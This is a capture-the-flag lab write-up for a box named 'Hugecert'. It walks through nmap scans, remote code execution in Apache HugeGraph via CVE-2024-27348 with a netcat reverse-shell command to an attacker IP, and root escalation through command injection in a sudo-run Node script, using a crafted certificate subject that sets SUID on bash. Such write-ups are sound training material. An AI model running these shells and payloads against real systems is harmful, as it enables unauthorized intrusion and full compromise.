Hugecert (Intermediate)

Host entries

  • 10.0.14.35

Content

  • RCE in Apache HugeGraph Server
  • Command Injection in certificate subject

Reconnaissance

Initial reconnaissance for TCP ports

nmap -p- -sS --open --min-rate 500 -Pn -n -vvvv -oG allPorts 10.0.14.35
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.0.14.35 ()     Status: Up
Host: 10.0.14.35 ()     Ports: 22/open/tcp//ssh///, 8080/open/tcp//http-proxy///

Services and Versions running:

nmap -p22,8080 -sCV -n -Pn -vvvv -oN targeted 10.0.14.35
Nmap scan report for 10.0.14.35
Host is up, received user-set (0.16s latency).
Scanned at 2025-02-24 16:33:28 EST for 176s

PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 79:1a:ac:bf:e9:92:f5:48:99:de:b0:17:62:e2:d1:9b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMfiQFI8we9T18DY6g3gb0FqxCUbdooHv8KHLGRUH7Enh/G711xtlPDbf5kJCqIutfOTAGEYSQqhZwgjCauHsXE=
|   256 38:1a:ab:2e:79:05:5a:01:88:be:f9:a0:cc:b9:ae:33 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICmdpjyxzBB3yNMwoIPp1kXeb/LaVj/tS8SBu+hcoR1M
8080/tcp open  http-proxy syn-ack ttl 63
|_http-title: Site doesn't have a title (application/json).
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
| fingerprint-strings:

Exploitation

There is a web service running on port 8080 called hugegraph v1.2.0. Looking for exploits on it, we identified CVE-2024-27348, an OS command injection vulnerability in Apache HugeGraph Server. After downloading the exploit from its git repository and executing it as the repository recommends, we have a way to execute commands:

python3 CVE-2024-27348.py -t http://10.0.14.35:8080 -c "nc -e /bin/bash 10.10.5.122 1234"
Proof of Concept exploit for CVE-2024-27348 Remote Code Execution in Apache HugeGraph Server by kljunowsky
[-] Request failed with status code: 500
[-] http://10.0.14.35:8080 may not be vulnerable
{"exception":"java.io.IOException","message":"error=2, No such file or directory","cause":"[java.io.IOException]"}
[+] Command executed successfully with payload 2
[+] Response:
{"exception":"java.lang.NoSuchFieldException","message":"","cause":"[java.lang.NoSuchFieldException]"}

Notice that we won't get any output from the executed command: commands such as id, cat and so on will run, but won't return any information.

Privilege Escalation

For the privilege escalation, I then ran sudo -l and found that I can execute a script as the root user without a password:

ETSCTF@hugecert:/opt/node/lib/node_modules/certer$ sudo -l
Matching Defaults entries for ETSCTF on hugecert:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ETSCTF may run the following commands on hugecert:
    (ALL : ALL) NOPASSWD: /opt/node/bin/certer

Its content is the following:

#!/opt/node/bin/node
const crypto = require("crypto");
const { exec } = require('child_process');
const fs = require('fs');
var args = process.argv.slice(2);
if(args.length===0)
{
  console.log("Provide a certificate file to process");
  process.exit(1);
}
cert = new crypto.X509Certificate(fs.readFileSync(args[0]).toString());
subj=cert.subject.replace(/\\/g, '').replace(/CN=/g,'');
exec(`mkdir /certs/${subj}`);

This creates a command injection in the mkdir call: the script takes whatever is in the certificate subject and interpolates it, unquoted, into a shell command that creates a folder with that name. So we can exploit this by placing shell commands in the subject of a crafted certificate. To do so, we first need to create a key:

openssl genpkey -algorithm RSA -out malicious.key

Then generate a file with the subject. I called mine malicious.conf and this is its content:

[ req ]
default_bits        = 2048
default_md          = sha256
prompt              = no
distinguished_name  = req_distinguished_name

[ req_distinguished_name ]
CN = ; chmod +s /bin/bash; #

Generate the Certificate Signing Request (CSR):

openssl req -new -key malicious.key -out malicious.csr -config malicious.conf

Use the CSR to create a self-signed certificate:

openssl x509 -req -in malicious.csr -signkey malicious.key -out malicious.crt -days 365

Certificate request self-signature ok
subject=CN=; chmod +s /bin/bash;

Read the certificate back, to be sure the subject was kept:

openssl x509 -in malicious.crt -text -noout
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            05:ed:21:55:1c:8c:e9:ec:a1:80:25:e7:45:76:3c:fe:46:7c:4c:9e
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=; chmod +s /bin/bash;
        Validity
            Not Before: Feb 24 21:27:23 2025 GMT
            Not After : Feb 24 21:27:23 2026 GMT
        Subject: CN=; chmod +s /bin/bash;
        Subject Public Key Info

And then run the sudo command:

ETSCTF@hugecert:/tmp$ sudo /opt/node/bin/certer malicious.crt
ETSCTF@hugecert:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23  2023 /bin/bash

AND WE ARE INSIDEEE!!!

Post Exploitation

Flags are stored at:

  • /etc/passwd
  • /etc/shadow
  • environment variables (env command)
  • /root

Credentials

  • No credentials were found

Notes

  • Always check for software versions to find any public exploit.
